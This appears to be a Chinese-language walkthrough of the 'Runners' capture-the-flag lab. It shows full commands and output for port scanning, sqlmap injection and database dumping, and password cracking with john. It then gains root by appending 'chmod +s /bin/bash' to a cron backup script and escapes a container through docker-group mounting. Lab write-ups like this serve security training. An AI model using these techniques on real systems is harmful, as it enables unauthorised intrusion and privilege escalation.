Runers

image

信息搜集

192.168.100.59

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.100.59 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.100.59:22
Open 192.168.100.59:80
Open 192.168.100.59:2222
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.59
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-10 04:52 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
Initiating ARP Ping Scan at 04:52
Scanning 192.168.100.59 [1 port]
Completed ARP Ping Scan at 04:52, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:52
Completed Parallel DNS resolution of 1 host. at 04:52, 0.29s elapsed
DNS resolution of 1 IPs took 0.29s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:52
Scanning 192.168.100.59 [3 ports]
Discovered open port 22/tcp on 192.168.100.59
Discovered open port 80/tcp on 192.168.100.59
Discovered open port 2222/tcp on 192.168.100.59
Completed SYN Stealth Scan at 04:52, 0.03s elapsed (3 total ports)
Initiating Service scan at 04:52
Scanning 3 services on 192.168.100.59
Completed Service scan at 04:52, 6.82s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.100.59
NSE: Script scanning 192.168.100.59.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.39s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
Nmap scan report for 192.168.100.59
Host is up, received arp-response (0.00059s latency).
Scanned at 2026-04-10 04:52:25 EDT for 8s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a9:95:53:cd:44:32:5e:69:4a:83:e6:e5:2d:bf:eb:82 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKLNo2slroLK4B4+IzyO4ibWn82Pezb44/b5hxorFBVpTwHJNMW6q/2u9/WpcbpSUgLya+j0g0zo7devF9MM4iE=
| 256 7b:cd:42:3f:1f:7d:aa:f3:58:8f:7d:85:93:c5:fa:01 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4tPo94klPK58wslxLdMnryD2EjPHu1cohW5uRSdAcu
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Runners Unlimited
|_http-server-header: Apache/2.4.41 (Ubuntu)
2222/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 da:58:27:97:82:a0:b0:c5:96:bc:69:7d:05:a0:c9:34 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJMQ5wBP+uQN6PeQoITc4hnIe3vXmLslUTxegSuL6Rrvscz8Q7lMOFBeGLj8ss57r/jbUJnrul7qMBkSA8+y4i3VMAGOgsMd/dcqfK/MKJ9WqT81Bn0RGD9TAnbRPOHu4HPaHQdb7/PIqYqh9ZrbvwDf3Lmj56bYgZ4WsmvZ2vfN2xQhifygS3aywsTtXUg97oAIJ6OOycEiAxvwAf92M5d2Vdrv6YWH367UtfHbhvuUKFiJOdr2mAHnFxsLto2Aq/4AaujqOOtam0YrREfgt8oYhWgeId2NZcJgfuAc1JOqkO5QxKp6ZwzKVOq/p1jbD9vHeIcq0w9+9A0sl+TYOdfxun3s/LQCj9jq1pahIKzpEIGaf47+7rB8+e5P9U0kzAr8hJntw5jyonVOxBzksrBZ/GZ/MVp3PMmt+cFhsQ1l1IrZLCGMT2xvGmLHzYITtZo4zSzKIpkvLW2COa+Mfi1zGZk9K7pDlbXWSXPYr5ddgX8KUQ1EzBI7SEcSjId9s=
| 256 fd:ce:34:44:25:fe:ee:6b:89:46:2d:05:eb:dc:86:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBASkkZYoCKFZDC5WCsNXVDBDRcsBho4mqn2ixnWBesooDu3XpvoW7HPiAYlWmudoT6t1sQ7fyXxcda8Ug4jpLuU=
| 256 7f:19:1b:7a:ba:aa:4f:65:62:f1:51:cf:89:c6:e7:b3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIImOqH8NvPPOGEMTqIarrP2Ym/ohe2Kr8vWNwbVt7iCm
MAC Address: 08:00:27:F6:CC:86 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/10%OT=22%CT=%CU=35637%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69D8BA51%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)
OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4
OS:ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Uptime guess: 39.391 days (since Sun Mar 1 18:29:39 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.100.59

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:52
Completed NSE at 04:52, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

image

2222也是openssh的

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.100.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,wsp,py,js,phps --exclude-length 279
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.59/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 279
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt,wsp,py,js,phps
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.100.59/images/]
/index.php (Status: 200) [Size: 6178]
/about.php (Status: 200) [Size: 9745]
/assets (Status: 301) [Size: 317] [--> http://192.168.100.59/assets/]
/post.php (Status: 200) [Size: 4395]
/posts.php (Status: 200) [Size: 5235]
/db.php (Status: 200) [Size: 0]
/README.txt (Status: 200) [Size: 820]
/elements.html (Status: 200) [Size: 25373]
/LICENSE.txt (Status: 200) [Size: 17128]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

值得注意的是post.php

image

可能存在sql注入

1
2
3
sqlmap -u http://192.168.100.59/post.php?id=1 --forms --batch -dbs
sqlmap -u http://192.168.100.59/post.php?id=1 --forms --batch -D blog --tables
sqlmap -u http://192.168.100.59/post.php?id=1 --forms --batch -D blog -T users --dump

image

3个user,但是密码是md5加密过的,需要解密

https://crackstation.net/

image

只有一个可以解密成功

david:runner

提权

david -> maria

ssh登录,需要注意的是这里端口是2222

1
ssh david@192.168.100.59 -p 2222

image

在david用户的家目录下存在一个hidden的隐藏文件夹里面有一个credenciales.zip

image

解压发现需要密码

image

将credenciales.zip 给get到kali使用john爆破

1
2
3
4
5
6
7
david@30acf6ca1fb6:~/.hidden$ scp credenciales.zip root@192.168.100.13:/tmp/aaa
The authenticity of host '192.168.100.13 (192.168.100.13)' can't be established.
ECDSA key fingerprint is SHA256:jQjMMqgoUWGmuckfiRpJHVK2TpkAbyFMLOr1Gwf4Jgo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.13' (ECDSA) to the list of known hosts.
root@192.168.100.13's password:
credenciales.zip

爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/tmp/aaa]
└─# zip2john credenciales.zip > hash.txt

ver 2.0 efh 5455 efh 7875 credenciales.zip/credenciales.xlsx PKZIP Encr: TS_chk, cmplen=4728, decmplen=5346, crc=BA8EA891 ts=7424 cs=7424 type=8

┌──(root㉿kali)-[/tmp/aaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockandroll (credenciales.zip/credenciales.xlsx)
1g 0:00:00:00 DONE (2026-04-10 05:30) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码是 rockandroll

解压发现有个xlsx文件

image

我将他get到本地Windows上查看发现了凭证

image

1
maria 4br53#j6p78mq#zbvc

image

maria -> root

在maria用户家目录下同样存在隐藏文件 .viminfo(是 Vim 编辑器状态历史记录文件)

image

可以看到都是一些关于/opt/scripts/backup.sh的

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/bin/bash

BACKUP_DIR="/srv/backups"
DB_NAME="blog"
DB_USER="root"
ZIP_PASSWORD="metallica"

BACKUP_FILE="$BACKUP_DIR/blog_backup_$(date +'%Y%m%d%H%M').sql"
/usr/bin/mysqldump -u $DB_USER $DB_NAME > $BACKUP_FILE

zip -P "$ZIP_PASSWORD" "${BACKUP_FILE}.zip" "$BACKUP_FILE"

rm -f "$BACKUP_FILE"

echo "$(date): Backup comprimido de la base de datos '$DB_NAME' creado en ${BACKUP_FILE}.zip" >> /var/log/backup.log

function cleanup_backups {
local total_backups=$(ls -1t "$BACKUP_DIR"/*.zip 2>/dev/null | wc -l)

if (( total_backups > 10 )); then
ls -1t "$BACKUP_DIR"/*.zip | tail -n +11 | while read -r old_backup; do
rm -f "$old_backup"
echo "$(date): Backup antiguo eliminado: $old_backup" >> /var/log/backup.log
done
fi
}

cleanup_backups

是一个备份数据的sh脚本同时我们还有权限修改。同时上传pspy

image

可以看到root一直在执行/opt/scripts/backup.sh

那么我们可以写入利用脚本到backup.sh给/bin/bash加权限

1
2
3
4
5
6
7
8
9
10
maria@30acf6ca1fb6:/opt/scripts$ echo "chmod +s /bin/bash" >> /opt/scripts/backup.sh 
maria@30acf6ca1fb6:/opt/scripts$ /bin/bash -p
maria@30acf6ca1fb6:/opt/scripts$ /bin/bash -p
maria@30acf6ca1fb6:/opt/scripts$ /bin/bash -p
maria@30acf6ca1fb6:/opt/scripts$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
maria@30acf6ca1fb6:/opt/scripts$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0#

当时以为到这结束了但发现并没有因为我们还在docker里面,这就解释了为什么有两个ssh端口2222是映射出来的

image

所以现在需要docker逃逸

docker逃逸

root -> ian

在root用户目录下TODO_LIST.txt给出了用户名和密码

  1. Crear un script para automatizar los backups de la base de datos. (OK)
  2. Cifrar las contraseñas de la base de datos. (OK)
  3. Avisar a Ian para que cambie su contraseña, a ver si deja usar su famosa contraseña “iambatman” en todos lados. (Pendiente)

ian:iambatman

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kali)-[/tmp/aaa]
└─# ssh ian@192.168.100.59
ian@192.168.100.59's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-49-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Fri Apr 10 10:01:03 AM UTC 2026

System load: 0.05 Processes: 138
Usage of /: 46.1% of 18.53GB Users logged in: 0
Memory usage: 38% IPv4 address for enp0s3: 192.168.100.59
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

2 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Nov 28 20:42:23 2024 from 192.168.1.17
ian@TheHackersLabs-Runners:~$

ian -> elliot

在/home/elliot目录下有一个psafe3文件(是一个由 Password Safe 软件创建的加密密码库文件)

解密他需要用户名和密码,但是现在缺少密码,这里可以使用pswafe2john 提取哈希值并破解

1
2
3
4
5
6
7
8
ian@TheHackersLabs-Runners:/home/elliot$ scp miscredenciales.psafe3  root@192.168.100.13:/tmp/aaa
The authenticity of host '192.168.100.13 (192.168.100.13)' can't be established.
ED25519 key fingerprint is SHA256:hUanazhkfAsz87B2MvgpsvjH+7JEXe/td8DmvO7BJ7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.13' (ED25519) to the list of known hosts.
root@192.168.100.13's password:
miscredenciales.psafe3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/tmp/aaa]
└─# chmod +x miscredenciales.psafe3

┌──(root㉿kali)-[/tmp/aaa]
└─# pwsafe2john miscredenciales.psafe3 > hash2.txt

┌──(root㉿kali)-[/tmp/aaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
metallica (miscredencial)
1g 0:00:00:00 DONE (2026-04-10 06:06) 16.66g/s 68266p/s 68266c/s 68266C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

elliot:metallica

image

输入密码

image

image

然后copy 4个密码

Fs5v3MO6E8GTJTJ
HwbE80ZOtZQdkYB
be8RxKniyGXYb2L
lHIiAIVFONoFjpl

经过尝试发现HwbE80ZOtZQdkYBs是用户elliot的密码

image

elliot -> root

1
2
elliot@TheHackersLabs-Runners:~$ id
uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),46(plugdev),110(docker)

使用docker组提权

https://gtfobins.org/gtfobins/docker/

1
2
3
4
5
6
7
elliot@TheHackersLabs-Runners:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
root_blog latest edee4bd56b6e 16 months ago 986MB
elliot@TheHackersLabs-Runners:/home/ian$ docker run -v /:/mnt --rm -it root_blog chroot /mnt /bin/bash
root@b585191dbbc0:/# whoami
root
root@b585191dbbc0:/#